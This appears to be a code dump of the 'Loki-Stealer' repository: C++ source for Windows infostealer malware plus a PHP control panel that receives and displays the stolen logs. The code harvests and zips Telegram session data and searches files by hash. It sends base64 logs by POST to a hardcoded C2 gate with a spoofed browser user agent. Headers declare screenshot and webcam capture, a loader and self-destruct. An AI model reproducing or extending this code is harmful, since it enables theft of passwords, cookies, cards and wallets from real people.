├── Panel ├── assets │ ├── index.html │ ├── css │ │ ├── index.html │ │ └── switch.css │ ├── GeoIP │ │ ├── index.html │ │ ├── geoip.dat │ │ └── geoip.php │ └── xenforo-logo.png ├── logs │ └── index.html ├── tmp │ └── index.html ├── stealer │ └── get_url.txt ├── auth.php ├── functions.php ├── url.php ├── viewer.php ├── converter.php ├── loader.php ├── install.php ├── gate.php └── index.php ├── Source ├── LokiStealer │ ├── ldr.h │ ├── Cred.h │ ├── CNC.h │ ├── Telegram.h │ ├── Search.h │ ├── Parse.h │ ├── LokiStealer.vcxproj.user │ ├── Export.h │ ├── vector.h │ ├── mem.cpp │ ├── mem.h │ ├── Fncs.h │ ├── vector.cpp │ ├── Search.cpp │ ├── CNC.cpp │ ├── Parse.cpp │ ├── Telegram.cpp │ ├── LokiStealer.vcxproj.filters │ ├── crypt.h │ ├── Export.cpp │ ├── Ldr.cpp │ ├── Cred.cpp │ ├── crypt.cpp │ ├── LokiStealer.vcxproj │ ├── Fncs.cpp │ ├── zip.h │ ├── parson.h │ └── Source.cpp └── LokiStealer.sln └── README.md /Panel/assets/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Panel/logs/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Panel/tmp/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Panel/assets/css/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Panel/assets/GeoIP/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Source/LokiStealer/ldr.h: -------------------------------------------------------------------------------- 1 | #pragma 
once 2 | void runLdr(); -------------------------------------------------------------------------------- /Panel/stealer/get_url.txt: -------------------------------------------------------------------------------- 1 | 1cb7b78acb7b698de4346095739a2ecb 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Loki-Stealer 2 | C++ stealer (passwords, cookies, forms, cards, wallets) 3 | -------------------------------------------------------------------------------- /Panel/assets/GeoIP/geoip.dat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecUser1/Loki-Stealer/HEAD/Panel/assets/GeoIP/geoip.dat -------------------------------------------------------------------------------- /Panel/assets/xenforo-logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecUser1/Loki-Stealer/HEAD/Panel/assets/xenforo-logo.png -------------------------------------------------------------------------------- /Source/LokiStealer/Cred.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | void enumCredentials(vector* file, SIZE_T* count); -------------------------------------------------------------------------------- /Source/LokiStealer/CNC.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | void sendLogsToCNC(LPCWSTR GetLink, CHAR* base64Logs, SIZE_T logsSize); -------------------------------------------------------------------------------- /Source/LokiStealer/Telegram.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include "zip.h" 4 | 5 | void enumTelegram(HZIP hZip, LPCWSTR dirPath, SIZE_T* telegram); 
-------------------------------------------------------------------------------- /Source/LokiStealer/Search.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include "vector.h" 4 | #include "crypt.h" 5 | 6 | void searchImpl(LPCWSTR dirPath, vector* v, uint32_t search_name); -------------------------------------------------------------------------------- /Source/LokiStealer/Parse.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "zip.h" 3 | 4 | void parserImpl(LPCWSTR list[], SIZE_T* count, SIZE_T size, LPCWSTR prefix, BOOL checkArray, HZIP hZip, LPCWSTR dirPath, BOOL checkSize = FALSE); -------------------------------------------------------------------------------- /Source/LokiStealer/LokiStealer.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Source/LokiStealer/Export.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include "vector.h" 4 | 5 | void vec_get_str(vector v, CHAR** c, SIZE_T* s, SIZE_T prefix_len); 6 | vector sqliteProcessFunction(LPCWSTR dbPath, SIZE_T* count_value, LPCSTR query, LPCSTR endstr, int addrn, int count, int encrypted_columns[], char* columns_prefix[], int encrypted_columns_count); -------------------------------------------------------------------------------- /Source/LokiStealer/vector.h: -------------------------------------------------------------------------------- 1 | #ifndef VECTOR_H__ 2 | #define VECTOR_H__ 3 | 4 | typedef struct vector_ { 5 | void** data; 6 | int size; 7 | int count; 8 | } vector; 9 | 10 | void vector_init(vector*); 11 | int vector_count(vector*); 12 | void vector_add(vector*, void*); 13 | void vector_set(vector*, int, void*); 14 | void *vector_get(vector*, int); 15 | void 
vector_delete(vector*, int); 16 | void vector_free(vector*); 17 | 18 | #endif -------------------------------------------------------------------------------- /Source/LokiStealer/mem.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include "mem.h" 3 | 4 | int _cmp(const void *m1, const void *m2, SIZE_T size) 5 | { 6 | BYTE *BM1 = (BYTE*)m1; 7 | BYTE *BM2 = (BYTE*)m2; 8 | for (; size--; ++BM1, ++BM2) if (*BM1 != *BM2) return (*BM1 - *BM2); 9 | return NULL; 10 | } 11 | 12 | void _copy(void* dst, void* src, SIZE_T size) { 13 | for (SIZE_T memccpy = 0; memccpy < size; ++memccpy) ((LPBYTE)(dst))[memccpy] = ((LPBYTE)(src))[memccpy]; 14 | } -------------------------------------------------------------------------------- /Source/LokiStealer/mem.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | #define _alloc(size) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, size + 64) 5 | #define _free(mem) if (mem) HeapFree(GetProcessHeap(), 0, mem) 6 | #define _set(mem, c, size) for (SIZE_T memcset = 0; memcset < size; ++memcset) { ((LPBYTE)mem)[memcset] = c; if (!memcset) memcset = 0; } 7 | #define _zero(mem, size) _set(mem, 0, size) 8 | void _copy(void* dst, void* src, SIZE_T size); 9 | int _cmp(const void *m1, const void *m2, SIZE_T size); -------------------------------------------------------------------------------- /Panel/auth.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Source/LokiStealer/Fncs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | #define ADMIN_PANEL L"#LINK#" 5 | #define API_URL L"gate.php" 6 | #define LDR_URL "/ldr.php" 7 | 8 | void randomInt(SIZE_T* out, int from, int to); 9 | LPCWSTR resolveEnvrimoment(const WCHAR* env); 10 | BOOL 
pathExists(LPCWSTR path, BOOL isFile); 11 | LPCWSTR bitGetHostByName(LPCWSTR domain); 12 | int captureScreenshot(LPCWSTR szFile); 13 | void captureCam(WCHAR* szPath); 14 | void CryptGenKey(BYTE** data); 15 | LPCWSTR getSystemInfoW(); 16 | void selfDestruct(); 17 | LPCSTR genCountry(); 18 | CHAR* randKey(); -------------------------------------------------------------------------------- /Panel/functions.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Panel/url.php: -------------------------------------------------------------------------------- 1 |

Ваша ссылка для бота


"; 23 | echo "http://".$_SERVER['HTTP_HOST']."/stealer"."=".$hash.""; 24 | ?> -------------------------------------------------------------------------------- /Panel/viewer.php: -------------------------------------------------------------------------------- 1 | query("SELECT id, hwid FROM `logs` WHERE id = ".$password)->fetch(PDO::FETCH_ASSOC); 8 | $file = str_replace("\n","
",file_get_contents('logs/'.$f['hwid'].'/passwords.log')); 9 | if($file==""){ 10 | echo "Nothing"; 11 | }else{ 12 | echo $file; 13 | } 14 | }else if(isset($_GET['browsers'])){ 15 | $browsers = $_GET['browsers']; 16 | $f = $pdoConnection->query("SELECT id, hwid FROM `logs` WHERE id = ".$browsers)->fetch(PDO::FETCH_ASSOC); 17 | if(isset($_GET['file'])){ 18 | $file = str_replace("\n","
",file_get_contents('logs/'.$f['hwid'].'/Browsers/'.$_GET['file'])); 19 | if($file==""){ 20 | echo "Nothing"; 21 | }else{ 22 | echo $file; 23 | } 24 | die(); 25 | } 26 | if(file_exists("logs/".$f['hwid']."/Browsers")) $dir = scandir("logs/".$f['hwid']."/Browsers"); else echo "Nothing"; 27 | foreach($dir as $file){ 28 | echo ''.$file.'
'; 29 | } 30 | } 31 | ?> -------------------------------------------------------------------------------- /Source/LokiStealer/vector.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "vector.h" 4 | #include "mem.h" 5 | 6 | void vector_init(vector *v) 7 | { 8 | v->data = NULL; 9 | v->size = 0; 10 | v->count = 0; 11 | } 12 | 13 | int vector_count(vector *v) 14 | { 15 | return v->count; 16 | } 17 | 18 | void vector_add(vector *v, void *e) 19 | { 20 | if (v->size == 0) { 21 | v->size = 10; 22 | v->data = (void**)malloc(sizeof(void*) * v->size); 23 | memset(v->data, '\0', sizeof(void*) * v->size); 24 | } 25 | 26 | if (v->size == v->count) { 27 | v->size *= 2; 28 | v->data = (void**)realloc(v->data, sizeof(void*) * v->size); 29 | } 30 | 31 | v->data[v->count] = e; 32 | v->count++; 33 | } 34 | 35 | void vector_set(vector *v, int index, void *e) 36 | { 37 | if (index >= v->count) { 38 | return; 39 | } 40 | 41 | v->data[index] = e; 42 | } 43 | 44 | void *vector_get(vector *v, int index) 45 | { 46 | if (index >= v->count) { 47 | return 0; 48 | } 49 | 50 | return v->data[index]; 51 | } 52 | 53 | void vector_delete(vector *v, int index) 54 | { 55 | if (index >= v->count) { 56 | return; 57 | } 58 | for (int i = index + 1, j = index; i < v->count; ++i) { 59 | v->data[j] = v->data[i]; 60 | ++j; 61 | } 62 | v->count--; 63 | } 64 | 65 | void vector_free(vector *v) 66 | { 67 | free(v->data); 68 | } -------------------------------------------------------------------------------- /Source/LokiStealer/Search.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "search.h" 4 | #include "vector.h" 5 | #include "crypt.h" 6 | #include "mem.h" 7 | #define FILE_ATTRIBUTES (FILE_ATTRIBUTE_ARCHIVE | FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM) 8 | 9 | void searchImpl(LPCWSTR dirPath, vector* v, 
uint32_t search_name) 10 | { 11 | if (WCHAR *strDir = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR))) 12 | { 13 | WIN32_FIND_DATAW fd; 14 | wnsprintfW(strDir, MAX_PATH, L"%s\\*", dirPath); 15 | HANDLE hIter = FindFirstFileW(strDir, &fd); 16 | if (hIter != INVALID_HANDLE_VALUE) 17 | { 18 | SIZE_T pos = -1; 19 | do 20 | { 21 | wnsprintfW(strDir, MAX_PATH, L"%s\\%s", dirPath, fd.cFileName); 22 | if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY && lstrcmpW(fd.cFileName, L".") != 0 && lstrcmpW(fd.cFileName, L"..") != 0) 23 | { 24 | searchImpl(strDir, v, search_name); 25 | } 26 | else if ((fd.dwFileAttributes & FILE_ATTRIBUTES)) 27 | { 28 | WCHAR* fn = PathFindFileNameW(strDir); 29 | if (crc(fn, lstrlenW(fn)) == search_name) { 30 | WCHAR* mem = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 31 | 32 | lstrcpyW(mem, strDir); 33 | vector_add(v, mem); 34 | } 35 | } 36 | } while (FindNextFileW(hIter, &fd)); 37 | FindClose(hIter); 38 | } 39 | 40 | _free(strDir); 41 | } 42 | } -------------------------------------------------------------------------------- /Panel/assets/css/switch.css: -------------------------------------------------------------------------------- 1 | /* The switch - the box around the slider */ 2 | .switch { 3 | position: relative; 4 | display: inline-block; 5 | width: 60px; 6 | height: 34px; 7 | } 8 | 9 | /* Hide default HTML checkbox */ 10 | .switch input { 11 | opacity: 0; 12 | width: 0; 13 | height: 0; 14 | } 15 | 16 | /* The slider */ 17 | .slider { 18 | position: absolute; 19 | cursor: pointer; 20 | top: 0; 21 | left: 0; 22 | right: 0; 23 | bottom: 0; 24 | background-color: #ccc; 25 | -webkit-transition: .4s; 26 | transition: .4s; 27 | } 28 | 29 | .slider:before { 30 | position: absolute; 31 | content: ""; 32 | height: 26px; 33 | width: 26px; 34 | left: 4px; 35 | bottom: 4px; 36 | background-color: white; 37 | -webkit-transition: .4s; 38 | transition: .4s; 39 | } 40 | 41 | input:checked + .slider { 42 | background-color: #2196F3; 43 | } 44 | 45 | input:focus + 
.slider { 46 | box-shadow: 0 0 1px #2196F3; 47 | } 48 | 49 | input:checked + .slider:before { 50 | -webkit-transform: translateX(26px); 51 | -ms-transform: translateX(26px); 52 | transform: translateX(26px); 53 | } 54 | 55 | /* Rounded sliders */ 56 | .slider.round { 57 | border-radius: 34px; 58 | } 59 | 60 | .slider.round:before { 61 | border-radius: 50%; 62 | } 63 | 64 | .collumn{ 65 | float:left; 66 | width:25%; 67 | } 68 | 69 | .x300 { 70 | width:300%; 71 | } 72 | 73 | .buttonsBlock{ 74 | clear:both; 75 | } -------------------------------------------------------------------------------- /Source/LokiStealer/CNC.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "crypt.h" 7 | #include "fncs.h" 8 | #include "cnc.h" 9 | #include "mem.h" 10 | 11 | #pragma comment(lib, "wininet.lib") 12 | #pragma comment(lib, "shlwapi.lib") 13 | 14 | void sendLogsToCNC(LPCWSTR GetLink, CHAR* base64Logs, SIZE_T logsSize) { 15 | LPCWSTR actual_domain = ADMIN_PANEL; 16 | 17 | SIZE_T outsize; 18 | LPCSTR param = base64Encode((LPBYTE)base64Logs, logsSize, &outsize); 19 | 20 | CHAR* szReq = (CHAR*)_alloc(outsize + 6); 21 | wnsprintfA(szReq, outsize + 6, "logs=%s", param); 22 | 23 | HINTERNET hIntSession = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); 24 | 25 | HINTERNET hHttpSession = InternetConnectW(hIntSession, actual_domain, 80, 0, 0, INTERNET_SERVICE_HTTP, 0, NULL); 26 | 27 | HINTERNET hHttpRequest = HttpOpenRequestW( 28 | hHttpSession, 29 | L"POST", 30 | GetLink, 31 | 0, 0, 0, INTERNET_FLAG_RELOAD, 0); 32 | 33 | const WCHAR* szHeaders = L"Content-Type: application/x-www-form-urlencoded"; 34 | if (!HttpSendRequestW(hHttpRequest, szHeaders, lstrlenW(szHeaders), (CHAR*)szReq, lstrlenA(szReq))) { 35 | return; 36 | } 37 | 38 | 
InternetCloseHandle(hHttpRequest); 39 | InternetCloseHandle(hHttpSession); 40 | InternetCloseHandle(hIntSession); 41 | _free((CHAR*)param); 42 | } -------------------------------------------------------------------------------- /Source/LokiStealer.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.4.33122.133 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "LokiStealer", "LokiStealer\LokiStealer.vcxproj", "{56647C63-4E31-4AB6-8C1A-6819A7A7C698}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {56647C63-4E31-4AB6-8C1A-6819A7A7C698}.Debug|x64.ActiveCfg = Debug|x64 17 | {56647C63-4E31-4AB6-8C1A-6819A7A7C698}.Debug|x64.Build.0 = Debug|x64 18 | {56647C63-4E31-4AB6-8C1A-6819A7A7C698}.Debug|x86.ActiveCfg = Debug|Win32 19 | {56647C63-4E31-4AB6-8C1A-6819A7A7C698}.Debug|x86.Build.0 = Debug|Win32 20 | {56647C63-4E31-4AB6-8C1A-6819A7A7C698}.Release|x64.ActiveCfg = Release|x64 21 | {56647C63-4E31-4AB6-8C1A-6819A7A7C698}.Release|x64.Build.0 = Release|x64 22 | {56647C63-4E31-4AB6-8C1A-6819A7A7C698}.Release|x86.ActiveCfg = Release|Win32 23 | {56647C63-4E31-4AB6-8C1A-6819A7A7C698}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {A3BE3387-15B5-49F7-A584-C57E0C3A1140} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Source/LokiStealer/Parse.cpp: 
-------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "parse.h" 4 | #include "mem.h" 5 | #include "zip.h" 6 | #define FILE_ATTRIBUTES (FILE_ATTRIBUTE_ARCHIVE | FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM) 7 | 8 | LONGLONG FileSize(const wchar_t* name) 9 | { 10 | WIN32_FILE_ATTRIBUTE_DATA fad; 11 | if (!GetFileAttributesEx(name, GetFileExInfoStandard, &fad)) 12 | return -1; // error condition, could call GetLastError to find out more 13 | LARGE_INTEGER size; 14 | size.HighPart = fad.nFileSizeHigh; 15 | size.LowPart = fad.nFileSizeLow; 16 | return size.QuadPart; 17 | } 18 | 19 | void parserImpl(LPCWSTR list[], SIZE_T* count, SIZE_T size, LPCWSTR prefix, BOOL checkArray, HZIP hZip, LPCWSTR dirPath, BOOL checkSize) 20 | { 21 | if (WCHAR *strDir = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR))) 22 | { 23 | WIN32_FIND_DATAW fd; 24 | wnsprintfW(strDir, MAX_PATH, L"%s\\*", dirPath); 25 | HANDLE hIter = FindFirstFileW(strDir, &fd); 26 | if (hIter != INVALID_HANDLE_VALUE) 27 | { 28 | do 29 | { 30 | wnsprintfW(strDir, MAX_PATH, L"%s\\%s", dirPath, fd.cFileName); 31 | if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY && lstrcmpW(fd.cFileName, L".") != 0 && lstrcmpW(fd.cFileName, L"..") != 0) 32 | { 33 | parserImpl(list, count, size, prefix, checkArray, hZip, strDir); 34 | } 35 | else if ((fd.dwFileAttributes & FILE_ATTRIBUTES)) 36 | { 37 | if (checkArray) { 38 | for(SIZE_T i = 0; i < size; i++){ 39 | if (StrStrW(fd.cFileName, list[i]) != 0) { 40 | WCHAR* zipName = (WCHAR*)_alloc((lstrlenW(fd.cFileName) + lstrlenW(prefix) + 4) * sizeof(WCHAR)); 41 | wnsprintfW(zipName, lstrlenW(fd.cFileName) + lstrlenW(prefix) + 4, L"%s\\%s", prefix, fd.cFileName); 42 | 43 | if (checkSize) if (FileSize(strDir) < (1024 * 1024 * 2)) 44 | ZipAdd(hZip, zipName, strDir); 45 | else 46 | ZipAdd(hZip, zipName, strDir); 47 | 48 | *count += 1; 49 | _free(zipName); 50 | } 51 | } 52 | } 53 | 
else { 54 | WCHAR* zipName = (WCHAR*)_alloc((lstrlenW(fd.cFileName) + lstrlenW(prefix) + 4) * sizeof(WCHAR)); 55 | wnsprintfW(zipName, lstrlenW(fd.cFileName) + lstrlenW(prefix) + 4, L"%s\\%s", prefix, fd.cFileName); 56 | ZipAdd(hZip, zipName, strDir); 57 | 58 | *count += 1; 59 | _free(zipName); 60 | } 61 | } 62 | } while (FindNextFileW(hIter, &fd)); 63 | FindClose(hIter); 64 | } 65 | _free(strDir); 66 | } 67 | } -------------------------------------------------------------------------------- /Source/LokiStealer/Telegram.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "Telegram.h" 4 | #include "fncs.h" 5 | #include "mem.h" 6 | #include "zip.h" 7 | #define FILE_ATTRIBUTES (FILE_ATTRIBUTE_ARCHIVE | FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM) 8 | 9 | void _processSubTg(HZIP hZip, LPCWSTR dirPath, LPCWSTR appd) { 10 | if (pathExists(dirPath, FALSE)) { 11 | if (WCHAR *strDir = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR))) 12 | { 13 | WIN32_FIND_DATAW fd; 14 | wnsprintfW(strDir, MAX_PATH, L"%s\\*", dirPath); 15 | HANDLE hIter = FindFirstFileW(strDir, &fd); 16 | if (hIter != INVALID_HANDLE_VALUE) 17 | { 18 | do 19 | { 20 | wnsprintfW(strDir, MAX_PATH, L"%s\\%s", dirPath, fd.cFileName); 21 | if ((fd.dwFileAttributes & FILE_ATTRIBUTES)) 22 | { 23 | WCHAR* zipName = (WCHAR*)_alloc((lstrlenW(PathFindFileNameW(strDir)) + 11 + lstrlenW(appd)) * sizeof(WCHAR)); 24 | wnsprintfW(zipName, lstrlenW(PathFindFileNameW(strDir)) + 11 + lstrlenW(appd), L"Telegram\\%s\\%s", appd, PathFindFileNameW(strDir)); 25 | ZipAdd(hZip, zipName, strDir); 26 | _free(zipName); 27 | } 28 | } while (FindNextFileW(hIter, &fd)); 29 | FindClose(hIter); 30 | } 31 | _free(strDir); 32 | } 33 | } 34 | } 35 | 36 | void enumTelegram(HZIP hZip, LPCWSTR dirPath, SIZE_T* telegram) { 37 | if (pathExists(dirPath, FALSE)) { 38 | if (WCHAR *strDir = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR))) 39 | { 
40 | WIN32_FIND_DATAW fd; 41 | wnsprintfW(strDir, MAX_PATH, L"%s\\*", dirPath); 42 | HANDLE hIter = FindFirstFileW(strDir, &fd); 43 | if (hIter != INVALID_HANDLE_VALUE) 44 | { 45 | do 46 | { 47 | wnsprintfW(strDir, MAX_PATH, L"%s\\%s", dirPath, fd.cFileName); 48 | if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY && lstrcmpW(fd.cFileName, L".") != 0 && lstrcmpW(fd.cFileName, L"..") != 0) 49 | { 50 | if (StrStrW(PathFindFileNameW(strDir), L"D877F783D5D3EF8C")) { 51 | WCHAR* mPath = (WCHAR*)_alloc((11 + lstrlenW(PathFindFileNameW(strDir))) * sizeof(WCHAR)); 52 | wnsprintfW(mPath, (11 + lstrlenW(PathFindFileNameW(strDir))), L"Telegram\\%s", PathFindFileNameW(strDir)); 53 | ZipAddFolder(hZip, mPath); 54 | _processSubTg(hZip, strDir, PathFindFileNameW(strDir)); 55 | _free(mPath); 56 | *telegram += 1; 57 | } 58 | enumTelegram(hZip, strDir, telegram); 59 | } 60 | else if ((fd.dwFileAttributes & FILE_ATTRIBUTES)) 61 | { 62 | if (StrStrW(PathFindFileNameW(strDir), L"D877F783D5D3EF8C")) { 63 | WCHAR* zipName = (WCHAR*)_alloc((lstrlenW(PathFindFileNameW(strDir)) + 10) * sizeof(WCHAR)); 64 | wnsprintfW(zipName, lstrlenW(PathFindFileNameW(strDir)) + 10, L"%s%s", L"Telegram\\", PathFindFileNameW(strDir)); 65 | ZipAdd(hZip, zipName, strDir); 66 | 67 | _free(zipName); 68 | } 69 | } 70 | } while (FindNextFileW(hIter, &fd)); 71 | FindClose(hIter); 72 | } 73 | _free(strDir); 74 | } 75 | } 76 | } -------------------------------------------------------------------------------- /Source/LokiStealer/LokiStealer.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source 
Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | Source Files 29 | 30 | 31 | Source Files 32 | 33 | 34 | Source Files 35 | 36 | 37 | Source Files 38 | 39 | 40 | Source Files 41 | 42 | 43 | Source Files 44 | 45 | 46 | Source Files 47 | 48 | 49 | Source Files 50 | 51 | 52 | Source Files 53 | 54 | 55 | Source Files 56 | 57 | 58 | Source Files 59 | 60 | 61 | Source Files 62 | 63 | 64 | 65 | 66 | Header Files 67 | 68 | 69 | Header Files 70 | 71 | 72 | Header Files 73 | 74 | 75 | Header Files 76 | 77 | 78 | Header Files 79 | 80 | 81 | Header Files 82 | 83 | 84 | Header Files 85 | 86 | 87 | Header Files 88 | 89 | 90 | Header Files 91 | 92 | 93 | Header Files 94 | 95 | 96 | Header Files 97 | 98 | 99 | Header Files 100 | 101 | 102 | Header Files 103 | 104 | 105 | Header Files 106 | 107 | 108 | -------------------------------------------------------------------------------- /Panel/converter.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | 9 | 10 | Converter 11 | 12 | 13 | 15 | 16 | 17 | 18 |

NETSCAPE:


JSON:

-------------------------------------------------------------------------------- /Source/LokiStealer/crypt.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | LPCSTR genHwid(); 6 | LPSTR base64Encode(LPBYTE source, SIZE_T sourceSize, SIZE_T *destSize); 7 | void TRAFFIC_ENCRYPT(unsigned char S[256], unsigned char* data, int data_len); 8 | 9 | namespace crcdetail 10 | { 11 | static constexpr const uint32_t table[256] = 12 | { 13 | 0x00000000U, 0x77073096U, 0xEE0E612CU, 0x990951BAU, 0x076DC419U, 14 | 0x706AF48FU, 0xE963A535U, 0x9E6495A3U, 0x0EDB8832U, 0x79DCB8A4U, 15 | 0xE0D5E91EU, 0x97D2D988U, 0x09B64C2BU, 0x7EB17CBDU, 0xE7B82D07U, 16 | 0x90BF1D91U, 0x1DB71064U, 0x6AB020F2U, 0xF3B97148U, 0x84BE41DEU, 17 | 0x1ADAD47DU, 0x6DDDE4EBU, 0xF4D4B551U, 0x83D385C7U, 0x136C9856U, 18 | 0x646BA8C0U, 0xFD62F97AU, 0x8A65C9ECU, 0x14015C4FU, 0x63066CD9U, 19 | 0xFA0F3D63U, 0x8D080DF5U, 0x3B6E20C8U, 0x4C69105EU, 0xD56041E4U, 20 | 0xA2677172U, 0x3C03E4D1U, 0x4B04D447U, 0xD20D85FDU, 0xA50AB56BU, 21 | 0x35B5A8FAU, 0x42B2986CU, 0xDBBBC9D6U, 0xACBCF940U, 0x32D86CE3U, 22 | 0x45DF5C75U, 0xDCD60DCFU, 0xABD13D59U, 0x26D930ACU, 0x51DE003AU, 23 | 0xC8D75180U, 0xBFD06116U, 0x21B4F4B5U, 0x56B3C423U, 0xCFBA9599U, 24 | 0xB8BDA50FU, 0x2802B89EU, 0x5F058808U, 0xC60CD9B2U, 0xB10BE924U, 25 | 0x2F6F7C87U, 0x58684C11U, 0xC1611DABU, 0xB6662D3DU, 0x76DC4190U, 26 | 0x01DB7106U, 0x98D220BCU, 0xEFD5102AU, 0x71B18589U, 0x06B6B51FU, 27 | 0x9FBFE4A5U, 0xE8B8D433U, 0x7807C9A2U, 0x0F00F934U, 0x9609A88EU, 28 | 0xE10E9818U, 0x7F6A0DBBU, 0x086D3D2DU, 0x91646C97U, 0xE6635C01U, 29 | 0x6B6B51F4U, 0x1C6C6162U, 0x856530D8U, 0xF262004EU, 0x6C0695EDU, 30 | 0x1B01A57BU, 0x8208F4C1U, 0xF50FC457U, 0x65B0D9C6U, 0x12B7E950U, 31 | 0x8BBEB8EAU, 0xFCB9887CU, 0x62DD1DDFU, 0x15DA2D49U, 0x8CD37CF3U, 32 | 0xFBD44C65U, 0x4DB26158U, 0x3AB551CEU, 0xA3BC0074U, 0xD4BB30E2U, 33 | 0x4ADFA541U, 0x3DD895D7U, 0xA4D1C46DU, 0xD3D6F4FBU, 0x4369E96AU, 34 | 0x346ED9FCU, 
0xAD678846U, 0xDA60B8D0U, 0x44042D73U, 0x33031DE5U, 35 | 0xAA0A4C5FU, 0xDD0D7CC9U, 0x5005713CU, 0x270241AAU, 0xBE0B1010U, 36 | 0xC90C2086U, 0x5768B525U, 0x206F85B3U, 0xB966D409U, 0xCE61E49FU, 37 | 0x5EDEF90EU, 0x29D9C998U, 0xB0D09822U, 0xC7D7A8B4U, 0x59B33D17U, 38 | 0x2EB40D81U, 0xB7BD5C3BU, 0xC0BA6CADU, 0xEDB88320U, 0x9ABFB3B6U, 39 | 0x03B6E20CU, 0x74B1D29AU, 0xEAD54739U, 0x9DD277AFU, 0x04DB2615U, 40 | 0x73DC1683U, 0xE3630B12U, 0x94643B84U, 0x0D6D6A3EU, 0x7A6A5AA8U, 41 | 0xE40ECF0BU, 0x9309FF9DU, 0x0A00AE27U, 0x7D079EB1U, 0xF00F9344U, 42 | 0x8708A3D2U, 0x1E01F268U, 0x6906C2FEU, 0xF762575DU, 0x806567CBU, 43 | 0x196C3671U, 0x6E6B06E7U, 0xFED41B76U, 0x89D32BE0U, 0x10DA7A5AU, 44 | 0x67DD4ACCU, 0xF9B9DF6FU, 0x8EBEEFF9U, 0x17B7BE43U, 0x60B08ED5U, 45 | 0xD6D6A3E8U, 0xA1D1937EU, 0x38D8C2C4U, 0x4FDFF252U, 0xD1BB67F1U, 46 | 0xA6BC5767U, 0x3FB506DDU, 0x48B2364BU, 0xD80D2BDAU, 0xAF0A1B4CU, 47 | 0x36034AF6U, 0x41047A60U, 0xDF60EFC3U, 0xA867DF55U, 0x316E8EEFU, 48 | 